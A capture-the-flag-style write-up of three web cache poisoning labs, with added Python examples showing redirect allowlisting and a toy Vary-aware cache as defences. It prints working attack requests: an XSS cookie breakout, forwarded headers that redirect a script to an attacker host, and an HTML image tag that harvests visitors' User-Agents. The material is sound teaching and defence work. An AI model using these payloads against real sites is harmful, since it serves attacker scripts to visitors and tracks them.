Web cache poisoning via headers

For an introduction to cache poisoning, see

Common cache-poisoning attacks that use headers include the following:

  • poisoning via a cookie
  • poisoning via a combination of several hidden parameters
  • poisoning with reference to the Vary header

Poisoning via a cookie

The target uses the language value in the cookie to adjust the site's language, and testing shows that the cookie is an unkeyed header.

Testing the cookie shows that the value of fehost affects the response: sending fehost=prod-cache-01 in the request cookie makes "frontend":"prod-cache-01" appear in the response.

######## normal request ########
GET / HTTP/1.1
...omit...
Cookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01

######## normal response ########
...omit...
Cache-Control: max-age=30
Age: 0
X-Cache: miss
...omit...
        <script>
            data = {
                "host":"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net",
                "path":"/",
                "frontend":"prod-cache-01"
            }
        </script>
...omit...

So by tampering with fehost in the cookie, the cache can be poisoned.

######## attack request ########
GET / HTTP/1.1
...omit...
Cookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString"-alert(1)-"someString

######## attack response ########
...omit...
Cache-Control: max-age=30
Age: 0
X-Cache: miss
...omit...
        <script>
            data = {
                "host":"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net",
                "path":"/",
                "frontend":"someString"-alert(1)-"someString"
            }
        </script>
...omit...

If any visitor requests the same URL within 30 seconds, they receive the poisoned page.

lab: Web cache poisoning with an unkeyed cookie


Poisoning via a combination of several hidden parameters

Sometimes a change in the response only appears when two hidden parameters are combined.

Taking this target as an example, param mining finds the following two hidden parameters, and observation shows that they are unkeyed headers:

  • X-Forwarded-Host: when combined with X-Forwarded-Scheme, this value becomes the new host in the redirect URL
  • X-Forwarded-Scheme: when the value is http://, a 302 is triggered

With X-Forwarded-Host: example.net alone, no effect is visible.

########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Host: example.net

########## response ###########
HTTP/1.1 504 Gateway Timeout

With X-Forwarded-Scheme: http:// alone, a 302 appears; switching it to https:// produces no change.

########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Scheme: http://
...omit...

########## response ###########
HTTP/1.1 302 Found
Location: https://ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net/resources/js/tracking.js
...omit...

But combining the two hidden parameters makes it possible to construct a redirecting request.

By replacing the host with the attacker's host and placing malicious code at resources/js/tracking.js on that host, the cache can be poisoned, as follows:

########## request ###########
GET /resources/js/tracking.js HTTP/1.1
Host: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net
X-Forwarded-Host: attackwebsite
X-Forwarded-Scheme: http://
...omit...

########## response ###########
HTTP/1.1 302 Found
Location: attackwebsite/resources/js/tracking.js
Connection: close
Cache-Control: max-age=30
Age: 7
X-Cache: hit

After poisoning, any visitor who requests resources/js/tracking.js within 30 seconds receives the attacker-supplied resources/js/tracking.js.

lab: Web cache poisoning with multiple headers
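The origin-side fix for the case above is to stop trusting X-Forwarded-Host and X-Forwarded-Scheme from arbitrary clients when building the redirect. The following is an added example, not code from the write-up or from the lab: it models the vulnerable redirect builder next to a hardened one that only honours a forwarded host from an allowlist and falls back to the request's own Host otherwise. The function names, the TRUSTED_HOSTS allowlist and the sample headers are constructed for this example.

```python
"""
Added example (not from the original write-up or the lab): building a
redirect from X-Forwarded-Host / X-Forwarded-Scheme.

Both builders return (status, location): (200, None) means "no redirect",
(302, url) is a redirect, (400, None) means the request was refused.
"""

# Constructed allowlist: the hostnames this application is really served under.
TRUSTED_HOSTS = {"app.example.net", "www.example.net"}


def _scheme(headers):
    """Normalise X-Forwarded-Scheme ('http', 'http://', 'HTTP:') to a bare scheme."""
    return headers.get("X-Forwarded-Scheme", "https").strip().lower().rstrip(":/")


def build_redirect_unsafe(headers, path):
    """Models the vulnerable behaviour seen in the lab: any non-https forwarded
    scheme triggers a 302, and the Location host is taken verbatim from
    X-Forwarded-Host, so a single request can cache a redirect to any host."""
    if _scheme(headers) == "https":
        return (200, None)
    host = headers.get("X-Forwarded-Host") or headers.get("Host", "")
    return (302, "https://%s%s" % (host, path))


def build_redirect_safe(headers, path):
    """Hardened builder: the redirect target can only be a host we serve, and the
    path must be a single absolute path (no protocol-relative '//host/...')."""
    if _scheme(headers) != "http":
        return (200, None)          # already https, or an unrecognised scheme: do nothing
    forwarded = (headers.get("X-Forwarded-Host") or "").strip().lower()
    # Honour X-Forwarded-Host only when it names a host we actually serve;
    # otherwise ignore it and use the Host header the request was sent to.
    host = forwarded if forwarded in TRUSTED_HOSTS else headers.get("Host", "").strip().lower()
    if host not in TRUSTED_HOSTS:
        return (400, None)          # unknown Host: refuse rather than redirect somewhere else
    if not path.startswith("/") or path.startswith("//"):
        return (400, None)
    return (302, "https://%s%s" % (host, path))


if __name__ == "__main__":
    # Constructed request headers mirroring the combined-header case above.
    req = {"Host": "app.example.net",
           "X-Forwarded-Host": "attacker.invalid",
           "X-Forwarded-Scheme": "http://"}
    print("unsafe:", build_redirect_unsafe(req, "/resources/js/tracking.js"))
    print("safe:  ", build_redirect_safe(req, "/resources/js/tracking.js"))
```

The allowlist is the important part: once the redirect can only point at hosts the application owns, a cached 302 is harmless even if the cache keeps ignoring these headers. The front-end cache should additionally either strip X-Forwarded-* from client requests or include them in the cache key, so that one client's headers never decide what other clients are served.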


Poisoning with reference to the Vary header

Taking this target as an example, param mining finds one hidden parameter, X-Host, which observation shows to be an unkeyed header, so it is poisoned as follows:

########## request ###########
GET / HTTP/1.1
Host: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net
X-Host: attackwebsite
...omit...

########## response ###########
...omit...
Vary: user-agent
...omit...
<script type="text/javascript" src="//attackwebsite/resources/js/tracking.js"></script>
...omit...

One thing to note here is that the response contains Vary: user-agent, which means User-Agent is a keyed header. In other words, besides requesting the same host, a visitor must also send the same User-Agent to receive the poisoned cache content.

On this target site, the comment section allows HTML, so each visitor's User-Agent can be obtained this way:

<img src="https://attackwebsite/foo" />

As soon as a visitor views the comment, the HTML is triggered; checking the web server logs on attackwebsite shows the visitor's User-Agent.

172.31.30.128   2023-09-18 08:40:09 +0000 "GET /foo HTTP/1.1" 404 "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"

Once the User-Agent Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 is obtained, a new poisoning request can be constructed as follows:

########## request ###########
GET / HTTP/1.1
Host: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net
X-Host: attackwebsite
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
...omit...

########## response ###########
...omit...
<script type="text/javascript" src="//attackwebsite/resources/js/tracking.js"></script>
...omit...

If any visitor requests the same host with the same User-Agent within 30 seconds, they receive the poisoned page.

Lab: Targeted web cache poisoning using an unknown header
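The two mechanisms that decide the blast radius in the cookie section and in this Vary section are the cache key and the origin's output encoding. The following added example (not code from the write-up, the lab, or any real cache) is a small in-memory cache whose key is host + path plus whatever request headers the stored response's Vary names, and an origin that reflects the fehost cookie into inline JavaScript the way the first lab does. It shows that an unkeyed, reflected cookie poisons the entry for every other visitor, that Vary: User-Agent narrows the victims to visitors with the same User-Agent, and what the two defences look like: the origin encoding the reflected value, or the cache keying on the cookie. All names, the marker string and the sample requests are constructed for this example.

```python
"""
Added example, not part of the original write-up: a toy HTTP cache with
Vary-aware keys, used to compare an unkeyed reflected cookie with the
origin-side and cache-side fixes.
"""
import json

PAYLOAD = 'x"-poisoned-"x'     # constructed marker: a value that would end a JS string literal
HOST = "app.example.net"        # constructed hostname


class Response:
    def __init__(self, headers, body):
        self.headers, self.body = headers, body


def _hdr(headers, name):
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    name = name.lower()
    return next((v for k, v in headers.items() if k.lower() == name), None)


def _cookie(headers, name):
    """Return one cookie's value from the Cookie header, or None."""
    for part in (_hdr(headers, "Cookie") or "").split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None


def make_origin(encode, vary=""):
    """Origin that reflects the fehost cookie into inline JS, as in the lab.
    encode=False reproduces the unsafe reflection; encode=True is the fix."""
    def origin(req):
        fehost = _cookie(req["headers"], "fehost") or "prod-cache-01"
        if encode:
            # JSON-encode the whole object so a quote becomes \" and cannot end the
            # string literal; also escape '<' so '</script>' cannot end the block.
            data = json.dumps({"frontend": fehost}).replace("<", "\\u003c")
        else:
            data = '{"frontend":"%s"}' % fehost
        headers = {"Cache-Control": "max-age=30"}
        if vary:
            headers["Vary"] = vary
        return Response(headers, "<script>data = %s</script>" % data)
    return origin


class Cache:
    """Cache key = (host, path) plus the request headers named by the stored Vary.
    Expiry (max-age) is deliberately not modelled."""
    def __init__(self, origin):
        self.origin, self.store, self.x_cache = origin, {}, None

    def _variant(self, req, vary):
        names = [n.strip().lower() for n in vary.split(",") if n.strip()]
        return tuple((n, _hdr(req["headers"], n)) for n in names)

    def get(self, req):
        base = (req["host"], req["path"])
        entry = self.store.get(base)
        if entry is not None:
            cached = entry["variants"].get(self._variant(req, entry["vary"]))
            if cached is not None:
                self.x_cache = "hit"          # served from cache, like X-Cache: hit
                return cached
        resp = self.origin(req)
        vary = _hdr(resp.headers, "Vary") or ""
        entry = self.store.setdefault(base, {"vary": vary, "variants": {}})
        entry["variants"][self._variant(req, vary)] = resp
        self.x_cache = "miss"
        return resp


def run_scenario(encode, vary=""):
    """One poisoning request primes the cache, then two visitors fetch the same
    URL. Returns which visitors received the marker unescaped."""
    cache = Cache(make_origin(encode, vary))

    def req(cookie, user_agent):
        return {"host": HOST, "path": "/",
                "headers": {"Cookie": cookie, "User-Agent": user_agent}}

    cache.get(req("fehost=" + PAYLOAD, "Chrome/80"))              # poisoning request
    same_ua = cache.get(req("session=victim1", "Chrome/80"))
    other_ua = cache.get(req("session=victim2", "Firefox/117"))
    return {"same_ua": PAYLOAD in same_ua.body, "other_ua": PAYLOAD in other_ua.body}


if __name__ == "__main__":
    print("unkeyed cookie, no Vary          :", run_scenario(encode=False))
    print("unkeyed cookie, Vary: User-Agent :", run_scenario(encode=False, vary="User-Agent"))
    print("origin encodes the value         :", run_scenario(encode=True))
    print("cache keys on Cookie             :", run_scenario(encode=False, vary="Cookie"))
```

The first scenario is the cookie lab: every visitor gets the poisoned entry. The second is this lab's situation: only visitors whose User-Agent matches the poisoning request are affected, which is exactly why the attacker had to learn a victim's User-Agent first. Encoding the reflected value removes the breakout even though the value is still cached, and is the fix to prefer; adding Cookie to Vary also stops the poisoning, but it effectively turns off shared caching for any response that depends on a cookie.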